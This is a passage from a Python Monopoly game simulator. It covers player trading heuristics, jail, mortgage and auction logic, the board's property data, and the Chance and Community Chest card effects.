group_number[property.group]\n group_countsB[group_num] += 1\n\n # Find all new monopolies that could be formed by trading.\n complete_groups = []\n for index in range(len(group_countsA)):\n if properties_in_group[index] == group_countsA[index] + group_countsB[index]:\n if properties_in_group[index] != group_countsA[index]:\n if properties_in_group[index] != group_countsB[index]:\n complete_groups.append(group_name[index])\n\n # Keep going if there are potential monopolies.\n if complete_groups:\n # Used to track which trade is the best for playerA.\n best_trade = False\n best_value = -1\n\n # Create pairs of groups.\n for group1 in complete_groups:\n for group2 in complete_groups:\n if group1 != group2:\n\n # See if playerA wants to do the deal.\n if playerA.group_values[group1] > playerA.group_values[group2]:\n\n # Find what amount of money playerB wants.\n extra_money = 0\n if playerB.group_values[group1] > playerB.group_values[group2]:\n extra_money = (playerB.group_values[group1] - playerB.group_values[group2]) / 2\n\n # See if playerA can afford this deal.\n if playerA.money - playerA.buying_threshold - extra_money > 0:\n\n # Find out what playerA thinks of this deal.\n perceived_value = playerA.group_values[group1] - playerA.group_values[group2] - extra_money\n\n pass # ##print({\"group1\": group1, \"group2\": group2, \"money\": extra_money, \"value\": perceived_value})\n\n # See if we have a better trade than the current best.\n if perceived_value > best_value:\n best_trade = {\"group1\": group1, \"group2\": group2,\n \"money\": extra_money,\n \"value\": perceived_value}\n best_value = perceived_value\n elif playerA.group_values[group1] < playerA.group_values[group2]:\n pass # The other case. TODO\n\n # If there actually is a legal trade, we execute the best one.\n if best_trade:\n pass # ##print(\"best\", best_trade)\n\n # playerA takes all properties from playerB in group1. Iterate over a copy: the list is mutated.\n for property in list(playerB.inventory):\n if property.group == best_trade[\"group1\"]:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(best_trade[\"group1\"])\n\n # Vice versa.\n for property in list(playerA.inventory):\n if property.group == best_trade[\"group2\"]:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(best_trade[\"group2\"])\n\n # playerA also pays playerB.\n game_info.exchange_money(amount=best_trade['money'],\n giver=playerA,\n receiver=playerB,\n summary=\"Making a trade.\")\n\n # We count how many properties in each group a player has and return a list.\n def property_counts(self, player):\n # To know where to store the counts in the list.\n group_number = {\"Brown\": 0, \"Light Blue\": 1,\n \"Pink\": 2, \"Orange\": 3,\n \"Red\": 4, \"Yellow\": 5,\n \"Green\": 6, \"Dark Blue\": 7,\n \"Utility\": 8, \"Railroad\": 9}\n\n # To store property counts.\n group_counts = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n # Loop through player's properties.\n for property in player.inventory:\n group_num = group_number[property.group]\n group_counts[group_num] += 1\n\n return group_counts\n\n # Given two lists of property counts, we find the potential new groups.\n def joint_groups(self, counts1, counts2):\n group_name = [\"Brown\", \"Light Blue\", \"Pink\", \"Orange\",\n \"Red\", \"Yellow\", \"Green\", \"Dark Blue\",\n \"Utility\", \"Railroad\"]\n\n properties_in_group = [2, 3, 3, 3, 3, 3, 3, 2, 2, 4]\n\n # To store all possible new groups.\n complete_groups = []\n\n # Loop through counts.\n for index in range(len(counts1)):\n # See if there are 
enough properties between the players.\n if properties_in_group[index] == counts1[index] + counts2[index]:\n # See that the group is not owned by just one player.\n if properties_in_group[index] != counts1[index] and properties_in_group[index] != counts2[index]:\n complete_groups.append(group_name[index])\n\n return complete_groups\n\n\n # Sophisticated trading with money.\n def trading2(self, game_info):\n # Tally properties for playerA.\n playerA = self\n group_countsA = self.property_counts(playerA)\n\n # Tally properties for playerB.\n for playerB in game_info.active_players:\n if playerB != playerA:\n group_countsB = self.property_counts(playerB)\n\n # Find all new monopolies that could be formed by trading.\n complete_groups = self.joint_groups(group_countsA, group_countsB)\n\n # Keep going if there are potential monopolies.\n if complete_groups:\n\n # Used to track which trade is the best for playerA.\n best_trade = False\n best_value = -1\n\n # Look at all pairs of groups. playerA wants group1 and playerB wants group2.\n for group1 in complete_groups:\n for group2 in complete_groups:\n if group1 != group2:\n\n # Find how much playerB can contribute to make the deal agreeable.\n money_available_for_playerB = max(playerB.money - playerB.get_buying_threshold(game_info), 0)\n money_playerB_could_contribute = (playerB.group_values[group2] - playerB.group_values[group1]) / 2\n extra_money = min(money_playerB_could_contribute, money_available_for_playerB)\n\n # Find out if playerA can even afford this trade.\n if extra_money + playerA.money - playerA.get_buying_threshold(game_info) > 0:\n # Find how much benefit playerA gets out of this deal.\n benefitA = playerA.group_values[group1] + 2 * extra_money - playerA.group_values[group2]\n if benefitA > best_value:\n best_trade = {\"group1\": group1,\n \"group2\": group2,\n \"money\": extra_money,\n \"value\": benefitA}\n\n best_value = benefitA\n\n # If there actually is a legal trade, we execute the best one.\n if best_trade:\n # playerA takes all properties from playerB in group1. Iterate over a copy: the list is mutated.\n for property in list(playerB.inventory):\n if property.group == best_trade[\"group1\"]:\n playerA.inventory.append(property)\n playerB.inventory.remove(property)\n playerA.add_monopoly(best_trade[\"group1\"])\n\n # Vice versa.\n for property in list(playerA.inventory):\n if property.group == best_trade[\"group2\"]:\n playerB.inventory.append(property)\n playerA.inventory.remove(property)\n playerB.add_monopoly(best_trade[\"group2\"])\n\n # Settle the cash side of the trade (a positive amount flows from playerB to playerA).\n if best_trade['money'] > 0:\n game_info.exchange_money(amount=best_trade['money'],\n giver=playerB,\n receiver=playerA,\n summary=\"Making a trade.\")\n else:\n game_info.exchange_money(amount=-best_trade['money'],\n giver=playerA,\n receiver=playerB,\n summary=\"Making a trade.\")\n\n # Trading based on evaluations.\n def property_trading(self, game_info):\n main_player = self\n for property in game_info.board:\n if property in main_player.inventory:\n prop_id = property.id\n best_player = game_info.players_with_best_property_values[prop_id]\n if main_player != best_player:\n money_offer = min(best_player.money - main_player.get_buying_threshold(game_info),\n best_player.property_values[prop_id])\n if money_offer > main_player.property_values[prop_id]:\n # Make the trade.\n game_info.exchange_money(amount=money_offer,\n giver=best_player,\n receiver=main_player,\n summary=\"Making a trade.\")\n best_player.inventory.append(property)\n main_player.inventory.remove(property)\n\n # Use a group ranking to 
trade properties.\n def discrete_property_trading(self, game_info):\n p1 = self\n\n p1_groups = []\n for property in p1.inventory:\n group = property.group\n if group not in p1.monopolies and group not in p1_groups:\n p1_groups.append(group)\n\n for p2 in game_info.development_order:\n if p2 != p1:\n p2_groups = []\n for property in p2.inventory:\n group = property.group\n if group not in p2.monopolies and group not in p2_groups:\n p2_groups.append(group)\n\n # Properties player 1 can give away.\n p1_sorted = []\n for group in p1.group_ordering:\n if group in p1_groups:\n p1_sorted.append(group)\n\n # Properties player 1 can get.\n p2_sorted = []\n for group in p1.group_ordering:\n if group in p2_groups:\n p2_sorted.append(group)\n\n # Reverse in place so the least-wanted groups are offered first.\n # (A bare reversed() call returns an iterator and has no effect.)\n p1_sorted.reverse()\n\n possible_trades = []\n for group1 in p1_sorted:\n for group2 in p2_sorted:\n if p1.group_ranking[group2] < p1.group_ranking[group1]:\n if p2.group_ranking[group1] < p2.group_ranking[group2]:\n possible_trades.append((group1, group2))\n\n for trade in possible_trades:\n group1 = trade[0]\n group2 = trade[1]\n\n while True:\n property1 = None\n property2 = None\n\n for property in p1.inventory:\n if property.group == group1:\n property1 = property\n break\n\n if not property1:\n break\n\n for property in p2.inventory:\n if property.group == group2:\n property2 = property\n break\n\n if not property2:\n break\n\n p1.inventory.append(property2)\n p2.inventory.append(property1)\n p1.inventory.remove(property1)\n p2.inventory.remove(property2)\n # print(\"trade:\",property1.name, property2.name)\n if property1 == property2:\n pass # ##print(\"!!!\") # Should never happen: group1 and group2 are distinct.\n\n if game_info.monopoly_status(current_property=property2, player=p1):\n p1.add_monopoly(property2.group)\n\n if game_info.monopoly_status(current_property=property1, player=p2):\n p2.add_monopoly(property1.group)\n\n\n # Determines how a player gets out of jail: use a GOOJF card or pay $50.\n def pay_out_of_jail(self, game_info):\n if self.chance_card:\n self.chance_card = False # The player uses his Chance GOOJF card.\n game_info.chance_cards.append(1) # Add the card back into the list.\n elif self.community_chest_card:\n self.community_chest_card = False # The player uses his Community Chest GOOJF card.\n game_info.community_chest_cards.append(1) # Add the card back into the list.\n else:\n # The player pays $50 to get out.\n game_info.exchange_money(amount=50, giver=self, receiver=game_info.bank, summary=\"Paying out of Jail.\")\n\n\n # Sell back one house or hotel on a property or sell all buildings back.\n def sell_building(self, property, building, game_info):\n # Sell one house on the property.\n if building == \"house\":\n property.buildings -= 1\n game_info.houses += 1\n self.money += property.house_cost / 2\n\n # Downgrade from a hotel to 4 houses.\n elif building == \"hotel\":\n property.buildings -= 1\n game_info.hotels += 1\n game_info.houses -= 4\n self.money += property.house_cost / 2\n\n # Sell all buildings on the property.\n elif building == \"all\":\n if property.buildings == 5: # The property has a hotel.\n property.buildings = 0\n game_info.hotels += 1\n self.money += (property.house_cost / 2) * 5\n else: # The property has houses.\n game_info.houses += property.buildings\n self.money += (property.house_cost / 2) * property.buildings\n property.buildings = 0\n\n # Decides how players make funds if they are in the hole.\n def make_funds(self, game_info):\n # # Mortgage properties if they are not in a monopoly. 
# #\n\n for board_space in self.inventory: # Cycle through the player's properties.\n if (board_space.group not in self.monopolies) and (not board_space.mortgaged):\n mortgage_value = board_space.price / 2 # Find the mortgage value.\n self.money += mortgage_value # Gain the mortgage value.\n board_space.mortgaged = True # Mortgage property.\n pass # ##print(\"player\",self.number,\"mortgaged\",board_space.name)\n if self.money > 0: # Check if the player is out of the hole.\n return # Exit function.\n\n # # Sell houses and hotels. # #\n\n # Check if the player has any monopolies\n if self.monopolies:\n\n # Initial condition.\n keep_selling = True\n\n while keep_selling:\n keep_selling = False\n for board_space in self.inventory:\n # It has buildings and we are selling \"evenly\".\n if board_space.buildings > 0 and self.even_selling_test(board_space):\n keep_selling = True # We should check again.\n if board_space.buildings == 5: # It's a hotel.\n if game_info.houses >= 4: # Check if there are 4 houses to replace the hotel.\n self.sell_building(board_space, \"hotel\", game_info) # Hotel - > 4 Houses\n else: # Not enough houses to break hotel.\n for board_space2 in self.inventory: # Sell back all buildings in GROUP.\n if board_space2.group == board_space.group:\n self.sell_building(board_space2, \"all\", game_info)\n else: # It's a house.\n self.sell_building(board_space, \"house\", game_info)\n if self.money > 0: # The player is out of the hole.\n return # Exit\n\n # # Mortgage properties in monopolies. # #\n\n for board_space in self.inventory: # Cycle through all board spaces.\n if not board_space.mortgaged:\n if board_space.group not in self.monopolies:\n pass # ##print('eee error')\n mortgage_value = board_space.price / 2 # Find the mortgage value.\n self.money += mortgage_value # Gain the mortgage value.\n board_space.mortgaged = True # Mortgage property.\n pass # ##print(\"player\",self.number,\"mortgaged\",board_space.name)\n if self.money > 0: # Check if the player is out of the hole.\n return # Exit function.\n\n # Allows the player to decide upon a jail strategy as soon as they are sent there.\n def set_jail_strategy(self, game_info):\n if self.smart_jail_strategy and game_info.first_building:\n self.jail_time = 3\n else:\n self.jail_time = self.init_jail_time\n\n # Decides if the player is selling evenly or not.\n def even_selling_test(self, property):\n for board_space in self.inventory:\n if board_space.group == property.group and board_space.buildings - property.buildings > 0:\n return False\n return True\n\n # Decides if the player is building evenly or not.\n def even_building_test(self, property):\n for board_space in self.inventory:\n if board_space.group == property.group and property.buildings - board_space.buildings > 0:\n return False\n return True\n\n # Calculate how much money a player has available to mortgage\n def find_available_mortgage_value(self):\n available_mortgage_value = 0\n for property in self.inventory:\n if property.buildings == 0 and not property.mortgaged and property.group not in self.monopolies:\n # Add mortgage value.\n available_mortgage_value += property.price / 2\n return available_mortgage_value\n\n # Decides how players make auction bids.\n def make_bid(self, property, game_info):\n # Reset these variables.\n self.bid_includes_mortgages = False\n self.mortgage_auctioned_property = False\n\n # If the player has a preference for the group.\n if property.group in self.group_preferences:\n self.auction_bid = self.money - 1\n\n # If the player will 
complete their group and wants to.\n elif self.complete_monopoly == 1 and \\\n game_info.monopoly_status(player=self, current_property=property, additional_properties=[property]):\n self.auction_bid = self.money - 1\n\n # If the player wants to mortgage properties.\n elif self.complete_monopoly == 2 and \\\n game_info.monopoly_status(player=self, current_property=property, additional_properties=[property]):\n self.bid_includes_mortgages = True\n # Find all the money the player can use by mortgaging other properties.\n available_mortgage_value = self.find_available_mortgage_value()\n self.auction_bid = self.money + available_mortgage_value - 1\n else:\n self.auction_bid = self.money - self.get_buying_threshold(game_info)\n\n # The bid should be at least the mortgage value of the property.\n if self.auction_bid < property.price / 2:\n self.auction_bid = property.price / 2\n self.mortgage_auctioned_property = True\n\n # Allows a player to gather the funds needed to complete an auction.\n def make_auction_funds(self, game_info, winning_bid, property):\n # If the player bid with the intention of mortgaging the property.\n if self.mortgage_auctioned_property:\n property.mortgaged = True\n self.money += property.price / 2\n\n # Special buying procedure if the player wants to mortgage properties.\n if self.bid_includes_mortgages:\n self.money -= winning_bid # Pay for property temporarily.\n\n # Make up the funds.\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.buildings == 0 and not c_property.mortgaged and c_property.group not in self.monopolies:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"mortgaged\",c_property.name)\n self.money += c_property.price / 2\n property_index += 1\n\n self.money += winning_bid # Pay money back.\n\n # Decides what the player does when he lands on an unowned property.\n def unowned_property_action(self, game_info, property):\n # The player has enough money to buy the property.\n if self.money - property.price >= self.get_buying_threshold(game_info):\n game_info.buy_property(self, property)\n return True\n\n # The player has a preference for the group and will pay any money they have.\n if property.group in self.group_preferences and self.money - property.price > 0:\n game_info.buy_property(self, property)\n return True\n\n # The player will gain a monopoly, they want to complete the group, and they have the money.\n if self.complete_monopoly == 1 and self.money - property.price > 0 and \\\n game_info.monopoly_status(self, property, additional_properties=[property]):\n game_info.buy_property(self, property)\n return True\n\n # The player will mortgage other properties to buy it if it completes a group.\n if self.complete_monopoly == 2 and \\\n game_info.monopoly_status(self, property, additional_properties=[property]):\n # Find all the money the player can use by mortgaging other properties.\n available_mortgage_value = self.find_available_mortgage_value()\n\n # If the player can mortgage to buy, they will.\n if (self.money + available_mortgage_value) - property.price > 0:\n self.money -= property.price # Pay for property.\n\n # Make up the funds.\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.buildings == 0 and not c_property.mortgaged and c_property.group not in self.monopolies:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"mortgaged\",c_property.name)\n self.money += c_property.price / 2\n property_index += 1\n\n 
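# Worked example with hypothetical numbers (not taken from the simulation): with $120\n # cash and a $200 property, money drops to -$80 after paying; the loop above then\n # mortgages a $180 singleton for +$90, leaving +$10 and ending the loop.\n 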
game_info.unowned_properties.remove(property) # Remove property from unowned properties list.\n self.inventory.append(property)\n self.add_monopoly(property.group) # Add the group to the player's list of monopolies.\n return True\n\n return False\n\n # Allow the player to make a decision about getting out of jail.\n def jail_decision(self, game_info):\n if self.jail_counter - 1 == self.jail_time:\n return True\n else:\n return False\n\n def highest_possible_rent(self, game_info):\n highest_possible_rent = 0\n for player in game_info.active_players:\n if player != self:\n for property in player.inventory:\n temp = game_info.calculate_rent(owner=player, property=property)\n if temp > highest_possible_rent:\n highest_possible_rent = temp\n return highest_possible_rent\n\n # Return buying threshold at current point in game\n def get_buying_threshold(self, game_info):\n if self.evolving_threshold > 0:\n addition = self.highest_possible_rent(game_info)\n # print(addition)\n return self.buying_threshold + (self.evolving_threshold * addition)\n else:\n return self.buying_threshold\n\n\n# Define the MoneyPool class.\nclass MoneyPool:\n def __init__(self, money):\n self.money = money\n\n\n# Define the BoardLocation class.\nclass BoardLocation:\n def __init__(self, id, name, price=0, group=\"none\", rents=(0, 0, 0, 0, 0, 0), house_cost=0):\n self.id = id\n self.name = name # The name of the board location.\n self.price = price # How much it costs to buy the property.\n self.rents = rents # The various rents.\n self.house_cost = house_cost # How much it costs for a house.\n self.group = group # Which group the property belongs to.\n self.buildings = 0 # The property starts with no development.\n self.visits = 0 # Hit counter.\n self.mortgaged = False\n self.owned = False\n\n\n# Define the Game class.\nclass Game:\n def __init__(self, list_of_players, auctions_enabled=True, trading_enabled=False,\n hotel_upgrade=False, building_sellback=False, new_trading=False, complex_trading=False,\n complex_trading2=False, property_trading=False, discrete_property_trading=False,\n free_parking_pool=False, double_on_go=False, no_rent_in_jail=False, trip_to_start=False,\n snake_eyes_bonus=False, cutoff=1000):\n self.active_players = list_of_players # Create a list of players.\n self.inactive_players = [] # An empty list to store losing players.\n self.turn_counter = 0 # Reset turn counter.\n self.doubles_counter = 0 # Reset doubles counter.\n self.houses = 32 # House supply.\n self.hotels = 12 # Hotel supply.\n self.winner = 1000 # Ending game data.\n self.dice_roll = 0 # The current dice roll can be accessible everywhere.\n\n self.auctions_enabled = auctions_enabled # A toggle to disable auctions.\n self.trading_enabled = trading_enabled\n self.hotel_upgrade = hotel_upgrade\n self.building_sellback = building_sellback\n self.new_trading = new_trading\n self.complex_trading = complex_trading\n self.complex_trading2 = complex_trading2\n self.property_trading = property_trading\n self.discrete_property_trading = discrete_property_trading\n self.first_building = False # Records whether a building has been bought for smart_jail_strategy\n self.cutoff = cutoff # Determines when a game should be terminated.\n self.loss_reason = [] # To store how a player lost the game.\n self.starting_player = 0 # Store which player started.\n self.create_board() # Set-up the board.\n self.create_cards() # Shuffle both card decks.\n\n best_property_values = [0 for i in range(40)]\n self.players_with_best_property_values = [None for i in 
range(40)]\n\n for player in self.active_players:\n for i in range(40):\n if player.property_values[i] > best_property_values[i]:\n best_property_values[i] = player.property_values[i]\n self.players_with_best_property_values[i] = player\n\n\n # Money pools.\n self.bank = MoneyPool(12500) # Create the bank.\n self.free_parking = MoneyPool(0) # Create the Free Parking pool.\n\n # Attributes for house rules.\n self.free_parking_pool = free_parking_pool\n self.double_on_go = double_on_go\n self.no_rent_in_jail = no_rent_in_jail\n self.trip_to_start = trip_to_start\n self.snake_eyes_bonus = snake_eyes_bonus\n\n\n # Create list of numbers to represent Chance and Community Chest cards.\n def create_cards(self):\n # Create cards.\n self.chance_cards = [i for i in range(1, 16 + 1)]\n self.community_chest_cards = [i for i in range(1, 16 + 1)]\n\n # Shuffle cards.\n shuffle(self.chance_cards)\n shuffle(self.community_chest_cards)\n\n # Reset index.\n self.chance_index = 0\n self.community_chest_index = 0\n\n # Creates a BoardLocation object for each space on the board.\n def create_board(self):\n # \"Name\", Price, \"Group\", (Rents), House Cost\n self.board = [\n BoardLocation(0, \"Go\"),\n BoardLocation(1, \"Mediterranean Ave.\", 60, \"Brown\", (2, 10, 30, 90, 160, 250), 50),\n BoardLocation(2, \"Community Chest\"),\n BoardLocation(3, \"Baltic Ave.\", 60, \"Brown\", (4, 20, 60, 180, 320, 450), 50),\n BoardLocation(4, \"Income Tax\"),\n BoardLocation(5, \"Reading Railroad\", 200, \"Railroad\"),\n BoardLocation(6, \"Oriental Ave.\", 100, \"Light Blue\", (6, 30, 90, 270, 400, 550), 50),\n BoardLocation(7, \"Chance\"),\n BoardLocation(8, \"Vermont Ave.\", 100, \"Light Blue\", (6, 30, 90, 270, 400, 550), 50),\n BoardLocation(9, \"Connecticut Ave.\", 120, \"Light Blue\", (8, 40, 100, 300, 450, 600), 50),\n BoardLocation(10, \"Just Visiting / In Jail\"),\n BoardLocation(11, \"St. Charles Place\", 140, \"Pink\", (10, 50, 150, 450, 625, 750), 100),\n BoardLocation(12, \"Electric Company\", 150, \"Utility\"),\n BoardLocation(13, \"States Ave.\", 140, \"Pink\", (10, 50, 150, 450, 625, 750), 100),\n BoardLocation(14, \"Virginia Ave.\", 160, \"Pink\", (12, 60, 180, 500, 700, 900), 100),\n BoardLocation(15, \"Pennsylvania Railroad\", 200, \"Railroad\"),\n BoardLocation(16, \"St. James Place\", 180, \"Orange\", (14, 70, 200, 550, 750, 950), 100),\n BoardLocation(17, \"Community Chest\"),\n BoardLocation(18, \"Tennessee Ave.\", 180, \"Orange\", (14, 70, 200, 550, 750, 950), 100),\n BoardLocation(19, \"New York Ave.\", 200, \"Orange\", (16, 80, 220, 600, 800, 1000), 100),\n BoardLocation(20, \"Free Parking\"),\n BoardLocation(21, \"Kentucky Ave.\", 220, \"Red\", (18, 90, 250, 700, 875, 1050), 150),\n BoardLocation(22, \"Chance\"),\n BoardLocation(23, \"Indiana Ave.\", 220, \"Red\", (18, 90, 250, 700, 875, 1050), 150),\n BoardLocation(24, \"Illinois Ave.\", 240, \"Red\", (20, 100, 300, 750, 925, 1100), 150),\n BoardLocation(25, \"B. & O. 
Railroad\", 200, \"Railroad\"),\n BoardLocation(26, \"Atlantic Ave.\", 260, \"Yellow\", (22, 110, 330, 800, 975, 1150), 150),\n BoardLocation(27, \"Ventnor Ave.\", 260, \"Yellow\", (22, 110, 330, 800, 975, 1150), 150),\n BoardLocation(28, \"Water Works\", 150, \"Utility\"),\n BoardLocation(29, \"Marvin Gardens\", 280, \"Yellow\", (24, 120, 360, 850, 1025, 1200), 150),\n BoardLocation(30, \"Go to Jail\"),\n BoardLocation(31, \"Pacific Ave.\", 300, \"Green\", (26, 130, 390, 900, 1100, 1275), 200),\n BoardLocation(32, \"North Carolina Ave.\", 300, \"Green\", (26, 130, 390, 900, 1100, 1275), 200),\n BoardLocation(33, \"Community Chest\"),\n BoardLocation(34, \"Pennsylvania Ave.\", 320, \"Green\", (28, 150, 450, 1000, 1200, 1400), 200),\n BoardLocation(35, \"Short Line Railroad\", 200, \"Railroad\"),\n BoardLocation(36, \"Chance\"),\n BoardLocation(37, \"Park Place\", 350, \"Dark Blue\", (35, 175, 500, 1100, 1300, 1500), 200),\n BoardLocation(38, \"Luxury Tax\"),\n BoardLocation(39, \"Boardwalk\", 400, \"Dark Blue\", (50, 200, 600, 1400, 1700, 2000), 200),\n ]\n\n # Copy the board to create a linked list of unowned properties.\n self.unowned_properties = []\n self.unowned_properties.extend(self.board)\n\n # Remove initial properties.\n for player in self.active_players:\n if player.initial_inventory:\n for id in player.initial_inventory:\n player.inventory.append(self.board[id])\n self.unowned_properties.remove(self.board[id])\n\n # Test for monopolies.\n for property in player.inventory:\n if property.group not in [\"Utility\", \"Railroad\"]:\n property.buildings = 0\n if property.group not in player.monopolies:\n if self.monopoly_status(player, property):\n player.add_monopoly(property.group)\n\n def get_roll(self):\n return randint(1, 6)\n\n # Defines the actions of the Community Chest cards.\n def community_chest(self, player):\n card = self.community_chest_cards[self.community_chest_index]\n if card == 1: # GET OUT OF JAIL FREE\n player.community_chest_card = True # Give the card to the player.\n self.community_chest_cards.remove(1) # Remove the card from the list\n elif card == 2: # PAY SCHOOL FEES OF $50 [UPDATED IN 2008]\n self.exchange_money(amount=50, giver=player, receiver=self.free_parking, summary=\"Community Chest.\")\n elif card == 3: # IT IS YOUR BIRTHDAY. 
/ COLLECT $10 / FROM EVERY PLAYER [UPDATED IN 2008]\n for individual in self.active_players: # For each player...\n self.exchange_money(amount=10, giver=individual, receiver=player, summary=\"Community Chest.\")\n elif card == 4: # XMAS FUND MATURES / COLLECT $100\n self.exchange_money(amount=100, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 5: # INCOME TAX REFUND / COLLECT $20\n self.exchange_money(amount=20, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 6: # YOU INHERIT $100\n self.exchange_money(amount=100, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 7: # YOU HAVE WON SECOND PRIZE IN A BEAUTY CONTEST / COLLECT $10\n self.exchange_money(amount=10, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 8: # BANK ERROR IN YOUR FAVOR / COLLECT $200\n self.exchange_money(amount=200, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 9: # RECEIVE $25 / CONSULTANCY FEE [WORDING UPDATED IN 2008]\n self.exchange_money(amount=25, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 10: # ADVANCE TO GO (COLLECT $200)\n self.move_to(player, 0) # Player moves to Go.\n elif card == 11: # YOU ARE ASSESSED FOR STREET REPAIRS\n if player.monopolies:\n house_counter = 0\n hotel_counter = 0\n for board_space in player.inventory: # Cycle through all board spaces.\n if board_space.buildings == 5:\n hotel_counter += 1 # Add hotels.\n else:\n house_counter += board_space.buildings # Add houses.\n house_repairs = 40 * house_counter # $40 PER HOUSE\n hotel_repairs = 115 * hotel_counter # $115 PER HOTEL\n self.exchange_money(amount=house_repairs + hotel_repairs, giver=player, receiver=self.free_parking,\n summary=\"Community Chest.\")\n elif card == 12: # LIFE INSURANCE MATURES / COLLECT $100\n self.exchange_money(amount=100, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 13: # DOCTOR'S FEE / PAY $50\n self.exchange_money(amount=50, giver=player, receiver=self.free_parking, summary=\"Community Chest.\")\n elif card == 14: # FROM SALE OF STOCK / YOU GET $50 [UPDATED IN 2008]\n self.exchange_money(amount=50, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 15: # PAY HOSPITAL $100\n self.exchange_money(amount=100, giver=player, receiver=self.free_parking, summary=\"Community Chest.\")\n elif card == 16: # GO TO JAIL\n self.go_to_jail(player) # Send player to jail.\n\n if card == 1 and self.community_chest_index == 15: # GOOJF card was at the end.\n self.community_chest_index = 0 # Restart deck.\n elif card == 1: # GOOJF card was somewhere else.\n pass # Do not change index.\n else:\n self.community_chest_index = (self.community_chest_index + 1) % len(\n self.community_chest_cards) # Increase index.\n\n # Defines the actions of the Chance cards.\n def chance(self, player):\n card = self.chance_cards[self.chance_index]\n if card == 1: # GET OUT OF JAIL FREE\n player.chance_card = True # Give the card to the player.\n self.chance_cards.remove(1) # Remove the card from the list\n elif card == 2: # GO DIRECTLY TO JAIL\n self.go_to_jail(player) # Send player to jail.\n elif card == 3: # YOUR BUILDING LOAN MATURES / COLLECT $150\n self.exchange_money(amount=150, giver=self.bank, receiver=player, summary=\"Chance.\")\n elif card == 4: # GO BACK 3 SPACES\n player.position -= 3 # Move player.\n self.board[player.position].visits += 1 # Increase hit counter.\n self.board_action(player, 
self.board[player.position])\n elif card == 5 or card == 11: # ADVANCE TOKEN TO THE NEAREST RAILROAD\n if player.position == 7:\n self.move_to(player, 15)\n elif player.position == 22:\n self.move_to(player, 25)\n elif player.position == 36:\n self.move_to(player, 5)\n player.card_rent = True\n self.board_action(player, self.board[player.position])\n elif card == 6: # ADVANCE TO GO (COLLECT $200)\n self.move_to(player, 0) # Player moves to Go.\n elif card == 7: # ADVANCE TO ILLINOIS AVE.\n self.move_to(player, 24)\n self.board_action(player, self.board[player.position])\n elif card == 8: # MAKE GENERAL REPAIRS ON ALL YOUR PROPERTY\n if player.monopolies:\n house_counter = 0\n hotel_counter = 0\n for board_space in player.inventory: # Cycle through all board spaces.\n if board_space.buildings == 5:\n hotel_counter += 1 # Add hotels.\n else:\n house_counter += board_space.buildings # Add houses.\n house_repairs = 45 * house_counter # $45 PER HOUSE\n hotel_repairs = 100 * hotel_counter # $100 PER HOTEL\n self.exchange_money(amount=house_repairs + hotel_repairs, giver=player, receiver=self.free_parking,\n summary=\"Chance.\")\n elif card == 9: # ADVANCE TO ST. CHARLES PLACE\n self.move_to(player, 11)\n self.board_action(player, self.board[player.position])\n elif card == 10: # ADVANCE TOKEN TO NEAREST UTILITY\n if player.position == 7:\n self.move_to(player, 12)\n elif player.position == 22:\n self.move_to(player, 28)\n elif player.position == 36:\n self.move_to(player, 12)\n player.card_rent = True\n self.board_action(player, self.board[player.position])\n elif card == 12: # PAY POOR TAX OF $15\n self.exchange_money(amount=15, giver=player, receiver=self.free_parking, summary=\"Chance.\")\n elif card == 13: # TAKE A RIDE ON THE READING RAILROAD\n self.move_to(player, 5)\n self.board_action(player, self.board[player.position])\n elif card == 14: # ADVANCE TOKEN TO BOARD WALK [sic.]\n self.move_to(player, 39)\n self.board_action(player, self.board[player.position])\n elif card == 15: # PAY EACH PLAYER $50\n for individual in self.active_players: # For each player...\n self.exchange_money(amount=50, giver=player, receiver=individual, summary=\"Chance.\")\n elif card == 16: # BANK PAYS YOU DIVIDEND OF $50\n self.exchange_money(amount=50, giver=self.bank, receiver=player, summary=\"Chance.\")\n\n if card == 1 and self.chance_index == 15: # GOOJF card was at the end.\n self.chance_index = 0 # Restart deck.\n elif card == 1: # GOOJF card was somewhere else.\n pass # Do not change index.\n else:\n self.chance_index = (self.chance_index + 1) % len(self.chance_cards) # Increase index.\n\n # Moves a player ahead.\n def move_ahead(self, player, number_of_spaces):\n new_position = (player.position + number_of_spaces) % 40\n if new_position < player.position: # Does the player pass Go?\n # The player collects $200 for passing Go.\n self.exchange_money(amount=200, giver=self.bank, receiver=player, summary=\"$200 from Go.\")\n player.passed_go = True\n player.position = new_position # Update the player's position.\n self.board[new_position].visits += 1 # Increase hit counter.\n\n # Moves a player to a specific spot.(Used in cards.)\n def move_to(self, player, new_position):\n if new_position < player.position: # Does the player pass Go?\n # The player collects $200 for passing Go.\n self.exchange_money(amount=200, giver=self.bank, receiver=player, summary=\"$200 from Go.\")\n player.passed_go = True # Parameter for house rule.\n player.position = new_position # Update the player's position.\n 
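# Worked example using the board ids defined in create_board above: a move from\n # St. James Place (16) to St. Charles Place (11) wraps past Go and collects $200,\n # while a move from 16 to Boardwalk (39) does not, since 39 > 16.\n 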
